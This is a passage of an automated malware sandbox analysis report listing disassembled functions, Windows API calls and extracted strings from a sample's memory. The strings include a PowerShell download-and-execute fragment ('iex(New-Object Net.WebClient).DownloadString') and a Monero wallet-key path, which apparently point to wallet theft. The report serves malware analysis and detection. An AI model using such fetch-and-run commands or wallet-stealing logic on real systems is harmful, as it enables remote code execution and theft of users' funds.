                            • lstrcat.KERNEL32(?,0140DB48), ref: 006047DB
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00604801
                            • lstrcat.KERNEL32(?,?), ref: 00604820
                            • lstrcat.KERNEL32(?,?), ref: 00604834
                            • lstrcat.KERNEL32(?,013FB248), ref: 00604847
                            • lstrcat.KERNEL32(?,?), ref: 0060485B
                            • lstrcat.KERNEL32(?,0140D318), ref: 0060486F
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 00608D90: GetFileAttributesA.KERNEL32(00000000,?,005F1B54,?,?,0061564C,?,?,00610E1F), ref: 00608D9F
                              • Part of subcall function 00604570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00604580
                              • Part of subcall function 00604570: RtlAllocateHeap.NTDLL(00000000), ref: 00604587
                              • Part of subcall function 00604570: wsprintfA.USER32 ref: 006045A6
                              • Part of subcall function 00604570: FindFirstFileA.KERNEL32(?,?), ref: 006045BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: d3800811a5adeb3513295b348b14c24139c70e7838b968b66e317116f4a4ee2e
                            • Instruction ID: 03b2a67505fa6a7a8dc235bbf8b0836cafb758ab5dd34810ffcc782139a4bae8
                            • Opcode Fuzzy Hash: d3800811a5adeb3513295b348b14c24139c70e7838b968b66e317116f4a4ee2e
                            • Instruction Fuzzy Hash: 2D3182B2940208ABCB58F7A4DC85EEA737DBB88300F404998B395960C1EE74D6898B95
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00602D85
                            Strings
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00602CC4
                            • <, xrefs: 00602D39
                            • ')", xrefs: 00602CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00602D04
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 4b60e0b86b943a8e79b66f5c90f49fcb8a1bb3c8e57be3ea5c94bc2745af4565
                            • Instruction ID: d88dd550708679912c51551d8d75b5fbc777742c522dde1f5fa5f71e05283bda
                            • Opcode Fuzzy Hash: 4b60e0b86b943a8e79b66f5c90f49fcb8a1bb3c8e57be3ea5c94bc2745af4565
                            • Instruction Fuzzy Hash: 3B41CD719502089ADB9CEBE0C895FDFB776AF14340F40811DE106A71D1DF746A8ACF95
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 005F9F41
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: 1c9702da27edbf7558521d78219b9b6aaf50bdb0ebd630671acade204d9970e3
                            • Instruction ID: dba83a6c3374d3acac3a576396a3450462e2bb240377e3c65b3de6d1c3e4ccc9
                            • Opcode Fuzzy Hash: 1c9702da27edbf7558521d78219b9b6aaf50bdb0ebd630671acade204d9970e3
                            • Instruction Fuzzy Hash: A9613E70A4024CDBDB18EFA4DC96FEE777ABF84340F008518FA0A5B191DB746A45CB56
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0140D158,00000000,00020119,?), ref: 006040F4
                            • RegQueryValueExA.ADVAPI32(?,0140DBA8,00000000,00000000,00000000,000000FF), ref: 00604118
                            • RegCloseKey.ADVAPI32(?), ref: 00604122
                            • lstrcat.KERNEL32(?,00000000), ref: 00604147
                            • lstrcat.KERNEL32(?,0140DC80), ref: 0060415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: aad5f134a6dd4f279e5ca61e6ad8e488bfb28555ebd8a2e39959ee2e7a11c090
                            • Instruction ID: a78963d7b4bbfed268c24eb94b71c880ffc2225044a9c5b18fcb703e8542a237
                            • Opcode Fuzzy Hash: aad5f134a6dd4f279e5ca61e6ad8e488bfb28555ebd8a2e39959ee2e7a11c090
                            • Instruction Fuzzy Hash: E0418AB6940108ABDB18FBA0DC46FFE773DB7C8300F40495DB75657181EA759B888B92
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00607E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,013FBCE8,00000000,00020119,?), ref: 00607E5E
                            • RegQueryValueExA.ADVAPI32(?,0140D2D8,00000000,00000000,000000FF,000000FF), ref: 00607E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00607E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 2f25993d4d0f9e1e6b0b797296c87fe8f121546f8fd65e864a9ed11ea6a2dc6c
                            • Instruction ID: 19059168020cb661e2056735c3eb90f9b2e483bbd249d3995ca5429e2095eb46
                            • Opcode Fuzzy Hash: 2f25993d4d0f9e1e6b0b797296c87fe8f121546f8fd65e864a9ed11ea6a2dc6c
                            • Instruction Fuzzy Hash: 1C115EB1A84205EBD708CF94DD49FBFBBB9FB44B10F104559F605A7280D7B568018BA1
                            APIs
                            • StrStrA.SHLWAPI(0140D9E0,?,?,?,0060140C,?,0140D9E0,00000000), ref: 0060926C
                            • lstrcpyn.KERNEL32(0083AB88,0140D9E0,0140D9E0,?,0060140C,?,0140D9E0), ref: 00609290
                            • lstrlen.KERNEL32(?,?,0060140C,?,0140D9E0), ref: 006092A7
                            • wsprintfA.USER32 ref: 006092C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: e978466fdba715cf12920ce965c6811f9839d9bc557a1af63b0f7f9e74f90b31
                            • Instruction ID: edef2f829572832d9ef99f3ec6a0133c257cc87e1ccd2e2bac3a2baad55404a9
                            • Opcode Fuzzy Hash: e978466fdba715cf12920ce965c6811f9839d9bc557a1af63b0f7f9e74f90b31
                            • Instruction Fuzzy Hash: 5B01CC75500108FFCB08DFECC985EAE7BB9FB84364F148548F9499B345C675AA40DB91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005F12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005F12F5
                            • RegCloseKey.ADVAPI32(?), ref: 005F12FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 8a7799a99951f4dc2257e7fdb7cd859b0b0e8173c3d7f7191b9d92fc3e2cafa0
                            • Instruction ID: fe9a3ead2b36395d2b8a965a9a27f63601764497e2e599a1480b0653f59f9717
                            • Opcode Fuzzy Hash: 8a7799a99951f4dc2257e7fdb7cd859b0b0e8173c3d7f7191b9d92fc3e2cafa0
                            • Instruction Fuzzy Hash: AB01E1B9A40208BBDB04DFE4DC89FAEB7B8FB88701F108559FA4597280D6759A058F51
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 21a5f02db6acc4431773051149c2c1f34a66dfa6b5d3adb543cc8a0a9d819653
                            • Instruction ID: 11bf737f15fdaf2f73408ad8b66682f54c6b923f355791c44271dfe90473c015
                            • Opcode Fuzzy Hash: 21a5f02db6acc4431773051149c2c1f34a66dfa6b5d3adb543cc8a0a9d819653
                            • Instruction Fuzzy Hash: 1D41377114074C5EDB298B24CC84FFB7BEA9F45314F1445ECE9CA861C2D2719A45CF24
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00606663
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00606726
                            • ExitProcess.KERNEL32 ref: 00606755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 4428bb7faaf938af9edaaf7bb47dbfa30f7bf0aab13b74ab2169f914189c32fd
                            • Instruction ID: a84bab06177695f2246e4aa91e06f02087ac2cbb59a3eee8c64a4882a52c7690
                            • Opcode Fuzzy Hash: 4428bb7faaf938af9edaaf7bb47dbfa30f7bf0aab13b74ab2169f914189c32fd
                            • Instruction Fuzzy Hash: 893147B1941208AADB98EB94DC82FDEB779AF54300F404588F24A661D1DF746B48CF6A
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00610E28,00000000,?), ref: 0060882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00608836
                            • wsprintfA.USER32 ref: 00608850
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 3b38d724920507cd3477015c69d87a9816e11c0e0a0689a1a35ab6cca14be271
                            • Instruction ID: 7e854ade7a8f7dc70ac432675cad7a0918681693e0460a2fe50319f293732252
                            • Opcode Fuzzy Hash: 3b38d724920507cd3477015c69d87a9816e11c0e0a0689a1a35ab6cca14be271
                            • Instruction Fuzzy Hash: 8D213DB1A40208AFDB08DFD4DD49FAEBBB8FB88701F104519F645A72C0C779A901CBA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0060951E,00000000), ref: 00608D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00608D62
                            • wsprintfW.USER32 ref: 00608D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: e0768300aa1efc0d1a4d511124b3011df7aa1a3e0a4ca23ce1d7dc1c47a1b26e
                            • Instruction ID: d81c12f07253f543b5eeeca9c1c14c4f27f62b0532675ad8ba484067f42870e2
                            • Opcode Fuzzy Hash: e0768300aa1efc0d1a4d511124b3011df7aa1a3e0a4ca23ce1d7dc1c47a1b26e
                            • Instruction Fuzzy Hash: 96E08CB0A40208FBDB04DB94DC0EE69B7B8FB84702F0004A4FD4A87280DA719E008B92
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FA2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 005FA3FF
                            • lstrlen.KERNEL32(00000000), ref: 005FA6BC
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 005FA743
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 989418a60de2a7c18fa9ae2b942aa5828938ecf609fa8b34ad01132874ba61df
                            • Instruction ID: 8bf965652598bb41bb86c699fa80bdacb38e52c407f6d501aded5db3f09e874e
